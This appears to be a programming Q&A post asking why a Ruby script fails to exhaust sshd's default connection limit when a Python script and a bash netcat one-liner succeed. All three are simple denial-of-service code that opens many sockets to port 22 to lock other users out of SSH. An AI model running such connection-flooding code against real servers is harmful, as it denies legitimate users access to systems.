# SSH Max Connection Ruby Script Not Working Properly

Tags: python, ruby, bash, sockets, ssh

Most sshd installs have a default limit of 10 connections. If you exceed this, all users who attempt to connect to the server will receive the error `ssh_exchange_identification: Connection closed by remote host`. This can be demonstrated with the simple bash onliner `for i in {0..12}; do nc targetserver.com 22 & done`. I also wrote a python script to demonstrate this:

```
#!/usr/bin/env python  
import socket  
socks=[]  
print "Building sockets. . ."  
for i in range(20):  
  socks.append(socket.socket(2,1))  
  socks[i].connect(('localhost',22))  
while 1:  
  pass  
print "Done."
```

which works perfectly. I then attempted to create the same script using ruby:

```
#!/usr/bin/env ruby  
require 'socket'  
socks = Array.new(20)  
puts "Building sockets...\n"  
for i in 0..19  
  socks[i] = TCPSocket.new('localhost', 22)  
end  
puts "Done.\n"  
while (true) do  
end
```

The ruby script does not get any errors and prints the expected output, but does not result in preventing other users from connecting to ssh. I verified that the ruby script is creating sockets with another python script I wrote:

```
#!/usr/bin/python  
from socket import socket as sock, SO_REUSEADDR as REUSE, SOL_SOCKET as SOL
host='localhost'  
port=5555
s=sock(2,1)  
s.setsockopt(SOL, REUSE, 1)  
s.bind((host,port))  
s.listen(port)  
i=0  
while 1:  
  s.accept()  
  i += 1  
  print i
```

And changing to destination port to 5555.
The only thing that comes to mind is that the sockets might be closing but I do not know why this would be. Is there anything else that would prevent this script from working?